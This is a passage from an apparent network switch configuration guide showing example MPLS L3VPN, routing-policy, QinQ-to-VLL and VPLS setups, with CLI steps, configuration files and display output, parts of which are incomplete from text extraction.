vlan batch 100 300
#
ipv4-family
#
mpls lsr-id 1.1.1.1
mpls
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
mpls

mpls ldp
#
#
#
#
interface LoopBack1
ip address 1.1.1.1 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
import-route direct
peer 10.1.1.100 as-number 65410
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 192.168.1.0 0.0.0.255
#
return
#
sysname PE2
#
vlan batch 100 200
#
ipv4-family
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif100
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
mpls
mpls ldp

#
#
#
#
interface LoopBack1
ip address 2.2.2.2 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
import-route direct
peer 10.1.1.100 as-number 65410
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 192.168.2.0 0.0.0.255
#
return
#
sysname PE3
#
#
ipv4-family
#
mpls lsr-id 3.3.3.3
mpls
#
mpls ldp
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
mpls
mpls ldp
#

interface Vlanif400
ip address 172.16.1.100 255.255.255.0
#
#
#
#
interface LoopBack1
ip address 3.3.3.3 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.1 enable
peer 2.2.2.2 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.1 enable
peer 2.2.2.2 enable
#
import-route direct
peer 172.16.1.200 as-number 65430
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
#
sysname Switch
#
vlan batch 100
#
#
#


stp disable
#
return

#
sysname CE1
#
vlan batch 100
#
interface Vlanif100
ip address 10.1.1.100 255.255.255.0
#
#
bgp 65410
#
ipv4-family unicast
import-route direct
#
return

#
sysname CE2
#
vlan batch 400
#
interface Vlanif400
ip address 172.16.1.200 255.255.255.0
#
#
bgp 65430
peer 172.16.1.100 as-number 100
#
ipv4-family unicast
import-route direct
#
return
14.1.5 Example for Configuring Routing Policies to Control

Mutual Access Between L3VPN Users
Overview
extended, suitable for large-sized deployment. BGP/MPLS IP VPN technology can be used to
implement secure communication or isolation between branches in different locations.
Routing policies are used to filter routes and set route attributes. You can change route
attributes to change a route over which network traffic is transmitted.

BGP/MPLS IP VPN can be combined with routing policies to control the receiving and
advertisement of VPN routes, implementing mutual access between specific branch users.
Configuration Notes
NOTE
As shown in Figure 14-5, CE1 is connected to the branch Site 1, and CE2 is connected to the
branch Site 2. Site 1 and Site 2 communicate with each other over the ISP backbone network.
The enterprise requires that L3VPN users on some network segments can securely
communicate with each other to meet service requirements.
Figure 14-5 Configuring routing policies to control mutual access between L3VPN users
VPN Backbone
Loopback1 Loopback1
1.1.1.9/32 2.2.2.9/32
GE2/0/0 GE2/0/0
VLANIF100 VLANIF100
PE1 172.10.1.1/24 172.10.1.2/24 PE2
GE1/0/0 GE1/0/0
VLANIF10 VLANIF10
192.168.1.1/24 192.168.2.1/24
CE1 GE1/0/0 GE1/0/0 CE2

VLANIF10 VLANIF10
192.168.1.2/24 192.168.2.2/24
vpna vpna
Site1 Site2
1. Configure OSPF between the PE devices to ensure IP connectivity on the backbone

network.
2. Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up MPLS LSP
tunnels for VPN data transmission on the backbone network.

3. Create VPN instances on the PE devices, bind CE interfaces to the VPN instances, and
assign different VPN targets to the VPN instances to isolate users from different
branches.
4. Configure routing policies on the PE devices and change the VPN targets of routes
filtered out based on specified routing policies to implement communication between
branch users on a specified network segment.
5. Set up EBGP peer relationships between the CE and PE devices so that they can
6. Configure MP-IBGP between the PE devices to enable them to exchange VPN routing
information.
Procedure
Step 1 Configure an IGP protocol on the MPLS backbone network so that the PE devices can
# Configure PE1.
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure PE2.
[PE2] ospf 1
[PE2-ospf-1] area 0


[PE2-ospf-1] quit
After the configuration is complete, run the display ospf peer command. The command
output shows that OSPF neighbor relationship has been set up between PE1 and PE2, and the
neighbor status is Full. Run the display ip routing-table command on PE1 and PE2, and you
can view that PE1 and PE2 have learned the routes to each other's Loopback1 address.
Step 2 Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up LDP LSPs on the
MPLS backbone network.
# Configure PE1.
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
# Configure PE2.
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
After the configuration is complete, PE1 and PE2 have established LDP sessions. Run the
display mpls ldp session command, and you can view that the LDP session status is
Operational.
Step 3 Configure a VPN instance on each PE device and connect the CE devices to the PE devices.
# Configure PE1.
[PE1-Vlanif10] quit
# Configure PE2.
[PE2-Vlanif10] quit
# Assign IP addresses to interfaces on CE1 and CE2 according to Figure 14-5.

[CE1] vlan batch 10
[CE1-GigabitEthernet1/0/0] port link type trunk
[CE1-Vlanif10] quit
[CE2] vlan batch 10
[CE2-GigabitEthernet1/0/0] port link type trunk
[CE2-Vlanif10] quit
PE1 and PE2 to view VPN instance configuration. The PE devices can ping local CE devices
attached to them.
NOTE
If a PE device has multiple interfaces bound to the same VPN instance, you need to specify a source IP
address when pinging the CE device connected to the remote PE device. To specify the source IP
address, set the -a source-ip-address parameter in the ping -vpn-instance vpn-instance-name -a source-
ip-address dest-ip-address command. If no source IP address is specified, the ping operation fails.
Step 4 Configure routing policies.
# Configure PE1.
[PE1] ip ip-prefix ipPrefix1 index 10 permit 192.168.1.0 24 greater-equal 24 less-
equal 32
[PE1] route-policy vpnroute permit node 1
[PE1-route-policy] if-match ip-prefix ipPrefix1
[PE1-route-policy] apply extcommunity rt 222:1
[PE1-route-policy] quit
[PE1-vpn-instance-vpna] export route-policy vpnroute
# Configure PE2.
[PE2] ip ip-prefix ipPrefix1 index 10 permit 192.168.2.0 24 greater-equal 24 less-
equal 32
[PE2] route-policy vpnroute permit node 1
[PE2-route-policy] if-match ip-prefix ipPrefix1
[PE2-route-policy] apply extcommunity rt 111:1
[PE2-route-policy] quit
[PE2-vpn-instance-vpna] export route-policy vpnroute
Step 5 Set up EBGP peer relationships between the PE and CE devices and import VPN routes.
# Configure CE1. The configuration of CE2 is similar to that of CE1, and is not mentioned
here.
[CE1] bgp 65410
[CE1-bgp] quit

# Configure PE1. The configuration of PE2 is similar to that of PE1, and is not mentioned
here.
[PE1] bgp 100
[PE1-bgp-vpna] quit
[PE1-bgp] quit
After the configuration is complete, run the display bgp vpnv4 vpn-instance vpna peer
command on PE1 and PE2. You can view that BGP peer relationships between PE and CE
devices have been established and are in the Established state.
Step 6 Set up an MP-IBGP peer relationship between PE1 and PE2.
# Configure PE1.
[PE1] bgp 100
[PE1-bgp] quit
# Configure PE2.
[PE2] bgp 100
[PE2-bgp] quit
After the configuration is complete, run the display bgp peer or display bgp vpnv4 all peer
command on PE1 and PE2. You can view that the BGP peer relationships have been
established between the PE devices and are in the Established state.
# Run the ping -vpn-instance command on PE1 and PE2. You can successfully ping the CE
site that is attached to the peer PE device.
The display on PE1 is used as an example:

[PE1] ping -vpn-instance vpna 192.168.2.2

0.00% packet loss
----End

Configuration Files
#
sysname PE1
#
vlan batch 10 100
#
ipv4-family
export route-policy vpnroute
#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif100
ip address 172.10.1.1 255.255.255.0
mpls
mpls ldp
#
#
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 2.2.2.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 2.2.2.9 enable
#
import-route direct
peer 192.168.1.2 as-number 65410
#
ospf 1
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 172.10.1.0 0.0.0.255
#
route-policy vpnroute permit node 1
if-match ip-prefix ipPrefix1
apply extcommunity rt 222:1
#
ip ip-prefix ipPrefix1 index 10 permit 192.168.1.0 24 greater-equal 24 less-
equal 32
#
return


#
sysname PE2
#
vlan batch 10 100
#
ipv4-family
export route-policy vpnroute
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif10
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif100
ip address 172.10.1.2 255.255.255.0
mpls
mpls ldp
#
#
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
bgp 100
#
ipv4-family unicast
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
import-route direct
peer 192.168.2.2 as-number 65420
#
ospf 1
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.10.1.0 0.0.0.255
#
route-policy vpnroute permit node 1
if-match ip-prefix ipPrefix1
apply extcommunity rt 111:1
#
ip ip-prefix ipPrefix1 index 10 permit 192.168.2.0 24 greater-equal 24 less-
equal 32
#
return

#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
#
bgp 65410
#
ipv4-family unicast
import-route direct
#
return
Configuration file of CE2

#
sysname CE2
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.2.2 255.255.255.0
#
#
bgp 65420
#
ipv4-family unicast
import-route direct
#
return
14.2 Example for Connecting QinQ Termination Sub-

interfaces to a VLL Network
Overview
As a point-to-point (P2P) Layer 2 tunneling technology based on MPLS, VLL transparently
transmits Layer 2 data packets over the MPLS backbone network, so that geographically
isolated sites that belong to the same VLAN can communicate with each other.
After QinQ termination sub-interfaces are connected to a VLL network, the sub-interfaces on
devices terminate double VLAN tags before sending the packets to the VLL network.
QinQ termination sub-interfaces apply to scenarios where all the VLANs (such as VLAN 100
to VLAN 200) of one site need to communicate with a remote site over the VLL network or
VLAN resources of the public network need to be saved. In these scenarios, the switching
device deployed between the CE and PE devices adds the same outer VLAN tag to packets
carrying different inner VLAN tags from different CE devices. The sub-interface on the PE

device then terminates double VLAN tags in QinQ packets and sends the packets to the VLL
tunnel.
QinQ is an extension to MAN Ethernet VPN on the core VLL network. It can form an end-to-
end VPN solution to implement Layer 2 communication between geographically isolated
users.
Configuration Notes
As shown in Figure 14-6, CE1 and CE2 are connected to PE1 and PE2 respectively through
VLANs.
A Martini VLL is set up between CE1 and CE2.
Switch1 is connected to CE1 and PE1.
Switch2 is connected to CE2 and PE2.
You are required to configure selective QinQ on the interfaces connected to CEs so that the
Switch adds the VLAN tags specified by the carrier to the packets sent from CEs.
When the Switch is connected to multiple CEs, the Switch can add the same VLAN tag to the
packets from different CEs, thereby saving VLAN IDs on the public network.
Figure 14-6 Networking diagram for connecting QinQ termination sub-interfaces to a VLL
network
Loopback1 Loopback1 Loopback1
1 .1 .1 .1 /3 2 2 .2 .2 .2 /3 2 3 .3 .3 .3 /3 2
G E 2 /0 /0 G E 1 /0 /0
PE1 PE2
G E 2 /0 /0 G E 1 /0 /0
G E 1 /0 /0 P G E 2 /0 /0
G E 2 /0 /0 G E 2 /0 /0
S w it c h 1 S w it c h 2
G E 1 /0 /0 G E 1 /0 /0
G E 1 /0 /0 G E 1 /0 /0
CE1 CE2
Switch Interface VLANIF Interface IP Address
PE1 GigabitEthernet1/0/0 GigabitEthernet1/0/0.1 -
- GigabitEthernet2/0/0 VLANIF20 10.1.1.1/24
- Loopback1 - 1.1.1.1/32
PE2 GigabitEthernet1/0/0 VLANIF30 10.2.2.1/24
- GigabitEthernet2/0/0 GigabitEthernet2/0/0.1 -
- Loopback1 - 3.3.3.3/32

Switch Interface VLANIF Interface IP Address
P GigabitEthernet1/0/0 VLANIF30 10.2.2.2/24
- GigabitEthernet2/0/0 VLANIF20 10.1.1.2/24
- Loopback1 - 2.2.2.2/32
CE1 GigabitEthernet1/0/0 VLANIF10 10.10.10.1/24
CE2 GigabitEthernet1/0/0 VLANIF10 10.10.10.2/24
1. Configure a routing protocol on devices (PE and P) of the backbone network to
implement interworking, and enable MPLS.
2. Use the default tunnel policy to create an LSP and configure the LSP for data
transmission.
3. Enable MPLS L2VPN and create VC connections on PEs.
4. Configure QinQ termination sub-interfaces on PE interfaces connected to the switches to
implement VLL access.
5. Configure selective QinQ on the switch interfaces connected to CEs.
Procedure
Step 1 Configure the VLANs to which interfaces of CEs, PEs, and P belong and assign IP addresses
to VLANIF interfaces according to Figure 14-6.
# Configure CE1 to ensure that packets sent from CE1 to Switch1 carry single VLAN tag.
[CE1] vlan batch 10
[CE1-Vlanif10] quit
# Configure CE2 to ensure that packets sent from CE2 to Switch2 carry single VLAN tag.
[CE2] vlan batch 10
[CE2-Vlanif10] quit
# Configure PE1.

[PE1] vlan batch 20

[PE1-Vlanif20] quit
# Configure the P.
[HUAWEI] sysname P
[P-GigabitEthernet1/0/0] port link-type hybrid
[P-GigabitEthernet1/0/0] port hybrid pvid vlan 30
[P-GigabitEthernet1/0/0] port hybrid tagged vlan 30
[P-GigabitEthernet2/0/0] port hybrid tagged vlan 20
[P-Vlanif20] quit
[P-Vlanif30] quit
# Configure PE2.
[PE2] vlan batch 30
[PE2-Vlanif30] quit
Step 2 Configure selective QinQ on interfaces of the Switch and specify the VLANs allowed by the
interfaces.
# Configure Switch1.
[Switch1] vlan 100
[Switch1] interface gigabitethernet2/0/0
[Switch1-GigabitEthernet2/0/0] port link-type hybrid
[Switch1-GigabitEthernet2/0/0] port hybrid tagged vlan 100
[Switch1-GigabitEthernet1/0/0] port hybrid untagged vlan 100
[Switch1-GigabitEthernet1/0/0] port vlan-stacking vlan 10 stack-vlan 100 //On a
fixed switch, first run the qinq vlan-translation enable command to enable VLAN
translation.

[Switch2] vlan 100

[Switch2-GigabitEthernet2/0/0] port hybrid tagged vlan 100
[Switch2-GigabitEthernet1/0/0] port hybrid untagged vlan 100
[Switch2-GigabitEthernet1/0/0] port vlan-stacking vlan 10 stack-vlan 100 //On a
fixed switch, first run the qinq vlan-translation enable command to enable VLAN
translation.
Step 3 Configure an IGP on the MPLS backbone network. OSPF is used as an example.
Configure PE1, P, and PE2 to advertise 32-bit loopback interface addresses as the LSR IDs.
# Configure PE1.
[PE1] router id 1.1.1.1
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure the P.
[P] router id 2.2.2.2
[P-LoopBack1] quit
[P] ospf 1
[P-ospf-1] area 0
[P-ospf-1] quit
# Configure PE2.
[PE2] router id 3.3.3.3
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1] quit
# After the configuration is complete, PE1, P, and PE2 can establish OSPF neighbor
relationships. Run the display ospf peer command. You can see that the OSPF neighbor
relationship status is Full. Run the display ip routing-table command. You can see that the
PEs learn the route to the Loopback1 interface of each other. The display on PE1 is used as an
example:

Neighbors


DR: 10.1.1.2 BDR: 10.1.1.1 MTU: 0
------------------------------------------------------------------------------

2.2.2.2/32 OSPF 10 1 D 10.1.1.2 Vlanif20
3.3.3.3/32 OSPF 10 2 D 10.1.1.2 Vlanif20
10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif20
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
10.2.2.0/24 OSPF 10 2 D 10.1.1.2 Vlanif20
Step 4 Enable basic MPLS functions and MPLS LDP on the MPLS backbone network.
# Configure PE1.
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1-Vlanif20] mpls
[PE1-Vlanif20] quit
# Configure the P.
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P-Vlanif20] mpls
[P-Vlanif20] quit
[P-Vlanif30] mpls
[P-Vlanif30] quit
# Configure PE2.
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2-Vlanif30] mpls
[PE2-Vlanif30] quit
Step 5 Set up a remote LDP session between PEs.

# Configure PE1.

[PE1] mpls ldp remote-peer 3.3.3.3

[PE1-mpls-ldp-remote-3.3.3.3] remote-ip 3.3.3.3
[PE1-mpls-ldp-remote-3.3.3.3] quit
# Configure PE2.
[PE2] mpls ldp remote-peer 1.1.1.1
[PE2-mpls-ldp-remote-1.1.1.1] remote-ip 1.1.1.1
[PE2-mpls-ldp-remote-1.1.1.1] quit
After the configuration is complete, run the display mpls ldp session command on PE1 to
view the LDP session setup. You can see that an LDP session is set up between PE1 and PE2.

------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Step 6 Enable MPLS L2VPN on PEs and set up VC connections.

# On PE1, create a VC connection on gigabitethernet1/0/0.1 connected to Switch1.
[PE1] mpls l2vpn
[PE1-l2vpn] quit
[PE1] interface gigabitethernet1/0/0
[PE1] interface gigabitethernet1/0/0.1
[PE1-GigabitEthernet1/0/0.1] qinq termination pe-vid 100 ce-vid 10
[PE1-GigabitEthernet1/0/0.1] mpls l2vc 3.3.3.3 101
# On PE2, create a VC connection on gigabitethernet2/0/0.1 connected to Switch2.

[PE2] mpls l2vpn
[PE2-l2vpn] quit
[PE2] interface gigabitethernet2/0/0
[PE2] interface gigabitethernet2/0/0.1
[PE2-GigabitEthernet2/0/0.1] mpls l2vc 1.1.1.1 101

Check the L2VPN connections on PEs. You can see that an L2VC connection has been set up
and is in Up state.
[PE1] display mpls l2vc interface gigabitethernet1/0/0.1
*client interface : GigabitEthernet1/0/0.1 is up
Administrator PW : no
session state : up
AC status : up
VC state : up
Label state : 0
Token state : 0

VC ID : 101
VC type : VLAN
destination : 3.3.3.3
local group ID : 0 remote group ID : 0
local VC label : 23552 remote VC label : 23552
local AC OAM State : up
local PSN OAM State : up
local forwarding state : forwarding
local status code : 0x0
remote AC OAM state : up
remote PSN OAM state : up
remote forwarding state: forwarding
remote status code : 0x0
ignore standby state : no
BFD for PW : unavailable
VCCV State : up
manual fault : not set
active state : active
forwarding entry : exist
link state : up
local VC MTU : 1500 remote VC MTU : 1500
local VCCV : alert ttl lsp-ping bfd
remote VCCV : alert ttl lsp-ping bfd
local control word : disable remote control word : disable
tunnel policy name : --
PW template name : --
primary or secondary : primary
load balance type : flow
Access-port : false
Switchover Flag : false
VC tunnel/token info : 1 tunnels/tokens
NO.0 TNL type : lsp , TNL ID : 0x10031
Backup TNL type : lsp , TNL ID : 0x0
create time : 1 days, 22 hours, 15 minutes, 9 seconds
up time : 0 days, 22 hours, 54 minutes, 57 seconds
last change time : 0 days, 22 hours, 54 minutes, 57 seconds
VC last up time : 2010/10/09 19:26:37
VC total up time : 1 days, 20 hours, 42 minutes, 30 seconds
CKey : 8
NKey : 3
PW redundancy mode : --
AdminPw interface : --
AdminPw link state : --
Diffserv Mode : uniform
Service Class : --
Color : --
DomainId : --
Domain Name : --
CE1 and CE2 can ping each other.
The display on CE1 is used as an example:

[CE1] ping 10.10.10.2

0.00% packet loss
----End

Configuration Files
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.10.10.1 255.255.255.0
#
#
return

#
sysname Switch1
#
vlan batch 100
#
#
#
return

#
sysname PE1
#
router id 1.1.1.1
#
vlan batch 20
#
mpls lsr-id 1.1.1.1
mpls
#
mpls l2vpn
#
mpls ldp
#
mpls ldp remote-peer 3.3.3.3
remote-ip 3.3.3.3
#
interface Vlanif20
ip address 10.1.1.1 255.255.255.0
mpls
mpls ldp
#
#
qinq termination pe-vid 100 ce-vid 10
mpls l2vc 3.3.3.3 101
#
#

interface LoopBack1
ip address 1.1.1.1 255.255.255.255
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 10.1.1.0 0.0.0.255
#
return
l Configuration file of the P
#
sysname P
#
router id 2.2.2.2
#
vlan batch 20 30
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif20
ip address 10.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif30
ip address 10.2.2.2 255.255.255.0
mpls
mpls ldp
#
#
#
interface LoopBack1
ip address 2.2.2.2 255.255.255.255
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.2.2.0 0.0.0.255
#
return
#
sysname PE2
#
router id 3.3.3.3
#
vlan batch 30
#
mpls lsr-id 3.3.3.3
mpls
#
mpls l2vpn
#
mpls ldp
#
mpls ldp remote-peer 1.1.1.1

remote-ip 1.1.1.1
#
interface Vlanif30
ip address 10.2.2.1 255.255.255.0
mpls
mpls ldp
#
#
#
mpls l2vc 1.1.1.1 101
#
interface LoopBack1
ip address 3.3.3.3 255.255.255.255
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 10.2.2.0 0.0.0.255
#
return

#
sysname Switch2
#
vlan batch 100
#
#
#
return

#
sysname CE2
#
vlan batch 10
#
interface Vlanif10
ip address 10.10.10.2 255.255.255.0
#
#
return

14.3 Example for Deploying BGP/MPLS IP VPN and VPLS

on One ISP Network
Overview
extended, suitable for large-sized deployment. When a new site is added, the network
administrator only needs to modify the configuration of the edge nodes serving the new site.
BGP/MPLS IP VPN is suitable for communication between the headquarters and branches in
different locations. As communication data needs to traverse the backbone network of the ISP,
BGP is used to advertise VPN routes and MPLS is used to forward VPN packets on the
backbone network. As different departments of an enterprise need to be isolated, BGP/MPLS
IP VPN can implement route isolation, address space isolation, and access isolation between
different VPNs.
VPLS integrates the advantages provided by Ethernet and MPLS. By emulating traditional
LAN functions, VPLS enables geographically isolated users on different Ethernet LANs to
communicate with each other over the IP/MPLS network provided by the ISP as if they were
on the same LAN.
As enterprises set up more and more branches in different regions and office flexibility
increases, applications such as instant messaging and teleconferencing are increasingly widely
used. This imposes high requirements for end-to-end (E2E) datacom technologies. Multiple
enterprise branches distributed in different regions need to communicate over the
metropolitan area network (MAN) provided by the ISP. Layer 2 service packets between
enterprise branches need to be transmitted over the MAN using the VPLS technology, so that
the enterprise branches in different regions can communicate with each other.
The ISP can use the same PE device to provide VPLS and L3VPN services for enterprises to
reduce the network construction costs.
Configuration Notes
l The SA series cards cannot be used in this example. The X1E series cards of V200R007
and later versions can be used in this example.
NOTE
As shown in Figure 14-7:
l An ISP provides both VPLS and L3VPN services.
l CE1 connected to the headquarters of enterprise A and CE3 connected to a branch
belong to the same VPLS to transmit Layer 2 services. CE1 and CE3 are bound to vpna
to implement secure transmission of Layer 3 data.
l CE2 connected to the headquarters of enterprise B and CE4 connected to a branch
belong to the same VPLS to transmit Layer 2 services. CE2 and CE3 are bound to vpna
to implement secure transmission of Layer 3 data.

l Selective QinQ needs to be configured on CE-side interfaces on switches to add outer

VLAN tags specified by the ISP to the packets sent from CE devices. If a switch
connects to multiple CE devices, it can add the same VLAN tag to packets from different
CE devices. This saves VLAN IDs on the ISP network.
Figure 14-7 Networking for deploying BGP/MPLS IP VPN and VPLS on one ISP network
AS: 65410 v s i1 v s i1 A S: 65430

vpna vpna
G E 1 /0 /0 G E 1 /0 /0
V L A N IF 1 0 CE1 V L A N IF 1 0 CE3
1 0 .1 .1 .1 /2 4 1 0 .3 .1 .1 /2 4
L o o p b a ck1
2 .2 .2 .9 /3 2
G E 1 /0 /0 G E 1 /0 /0 G E 2 /0 /0 G E 1 /0 /0
PE1 V L A N IF 3 0 V L A N IF 6 0 PE2
L o o p b a ck1 1 7 2 .1 .1 .2 /2 4 1 7 2 .2 .1 .1 /2 4 L o o p b a ck1
1 .1 .1 .9 /3 2 G E 3 /0 /0 3 .3 .3 .9 /3 2
G E 3 /0 /0
V L A N IF 3 0 P V L A N IF 6 0
G E 2 /0 /0 1 7 2 .1 .1 .1 /2 4 1 7 2 .2 .1 .2 /2 4 G E 2 /0 /0
AS: 100
VPN Backbone
G E 2 /0 /0 G E 2 /0 /0
S w itc h 1 S w itc h 2
G E 1 /0 /0 G E 1 /0 /0
G E 1 /0 /0 G E 1 /0 /0
CE2 V L A N IF 2 0 V L A N IF 2 0 CE4
1 0 .2 .1 .1 /2 4 1 0 .4 .1 .1 /2 4
vpnb vpnb
v s i2 v s i2
AS: 65420 A S : 65440
Data Plan
Device Interface Sub-interface IP Address
PE1 GigabitEthernet1/0/0 GigabitEthernet1/0/0.1 10.1.1.2/24
GigabitEthernet1/0/0.2
GigabitEthernet2/0/0 GigabitEthernet2/0/0.1 10.2.1.2/24
PE2 GigabitEthernet1/0/0 GigabitEthernet1/0/0.1 10.3.1.2/24
GigabitEthernet2/0/0 GigabitEthernet2/0/0.1 10.4.1.2/24

1. Configure OSPF between the P and PE devices to ensure IP connectivity on the
backbone network.
2. Enable basic MPLS capabilities and MPLS LDP on the P and PE devices to set up
MPLS LSP tunnels for VPN data transmission on the backbone network.
3. Configure MP-IBGP on PE1 and PE2 to enable them to exchange VPN routing
information.
4. Configure BGP/MPLS IP VPN. Configure L3VPN instances vpna and vpnb on PE1 and
PE2. Set the VPN target of vpna to 111:1 and the VPN target of vpnb to 222:2. This
configuration allows users in the same VPN to communicate with each other and isolates
users of different VPNs. Configure dot1q termination sub-interfaces for single-tagged
packets sent from CE1 and CE3. Configure QinQ termination sub-interfaces for double-
tagged packets sent from CE2 and CE4.
5. Configure the VPLS service. Create VPLS VSI instances on PE1 and PE2. In each VSI
instance, specify BGP as the signaling protocol, and set the RD, VPN target and site.
Bind sub-interfaces to VSI instances so that the sub-interfaces function as AC interfaces
to provide access for VPLS users. Configure dot1q termination sub-interfaces for single-
tagged packets sent from CE1 and CE3. Configure QinQ termination sub-interfaces for
double-tagged packets sent from CE2 and CE4.
6. Configure selective QinQ on CE-side interfaces of the switches and specify the VLANs
allowed by the interfaces.
7. Set up EBGP peer relationships between the CE and PE devices so that they can
Procedure
Step 1 Configure an IGP protocol on the MPLS backbone network so that the PE and P devices can
# Configure PE1.
[PE1] vlan batch 30
[PE1-Vlanif30] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1] quit
# Configure the P.
[HUAWEI] sysname P


[P-LoopBack1] quit
[P-GigabitEthernet1/0/0] port hybrid untagged vlan 30
[P-GigabitEthernet2/0/0] port hybrid untagged vlan 60
[P-Vlanif30] quit
[P-Vlanif60] quit
[P] ospf 1
[P-ospf-1] area 0
[P-ospf-1] quit
# Configure PE2.
[PE2] vlan batch 60
[PE2-Vlanif60] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1] quit
After the configuration is complete, OSPF neighbor relationships can be set up between PE1,
P, and PE2. Run the display ospf peer command on PE1, P, and PE2, and you can view that
the neighbor status is Full. Run the display ip routing-table command on PE1 and PE2, and
you can view that PE1 and PE2 have learned the routes to each other's Loopback1 address.
------------------------------------------------------------------------------

2.2.2.9/32 OSPF 10 1 D 172.1.1.2 Vlanif30
3.3.3.9/32 OSPF 10 2 D 172.1.1.2 Vlanif30


172.1.1.0/24 Direct 0 0 D 172.1.1.1 Vlanif30
172.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
172.2.1.0/24 OSPF 10 2 D 172.1.1.2 Vlanif30

Neighbors

DR: 172.1.1.2 BDR: 172.1.1.1 MTU: 0
Step 2 Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up LDP LSPs on the
MPLS backbone network.
# Configure PE1.
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1-Vlanif30] mpls
[PE1-Vlanif30] quit
# Configure the P.
[P] mpls
[P-mpls] quit
[P] mpls ldp
[P-mpls-ldp] quit
[P-Vlanif30] mpls
[P-Vlanif30] quit
[P-Vlanif60] mpls
[P-Vlanif60] quit
# Configure PE2.
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2-Vlanif60] mpls
[PE2-Vlanif60] quit
After the configuration is complete, LDP sessions are established between PE1 and the P and
between the P and PE2. Run the display mpls ldp session command on PE1, P, and PE2, and
you can view that the LDP session status is Operational. Run the display mpls ldp lsp
command, and you can view information about the established LDP LSPs.


------------------------------------------------------------------------------
------------------------------------------------------------------------------
------------------------------------------------------------------------------
[PE1] display mpls ldp lsp
LDP LSP Information

-------------------------------------------------------------------------------
Flag after Out IF: (I) - LSP Is Only Iterated by RLFA
-------------------------------------------------------------------------------
DestAddress/Mask In/OutLabel UpstreamPeer NextHop OutInterface
-------------------------------------------------------------------------------
1.1.1.9/32 3/NULL 2.2.2.9 127.0.0.1 Inloop0
*1.1.1.9/32 Liberal/1025 DS/2.2.2.9
2.2.2.9/32 NULL/3 - 172.1.1.2 Vlanif30
2.2.2.9/32 1024/3 2.2.2.9 172.1.1.2 Vlanif30
3.3.3.9/32 NULL/1025 - 172.1.1.2 Vlanif30
3.3.3.9/32 1025/1025 2.2.2.9 172.1.1.2 Vlanif30
-------------------------------------------------------------------------------
TOTAL: 5 Normal LSP(s) Found.
TOTAL: 1 Liberal LSP(s) Found.
TOTAL: 0 Frr LSP(s) Found.
A '*' before an LSP means the LSP is not established
A '*' before a Label means the USCB or DSCB is stale
A '*' before a UpstreamPeer means the session is stale
A '*' before a DS means the session is stale
A '*' before a NextHop means the LSP is FRR LSP
Step 3 Configure L3VPN instances on the PE devices. Configure dot1q termination sub-interfaces
for single-tagged packets from vpna. Configure QinQ termination sub-interfaces for double-
tagged packets from vpnb. (Layer 3 service users are identified by VLAN 10 and VLAN 20,
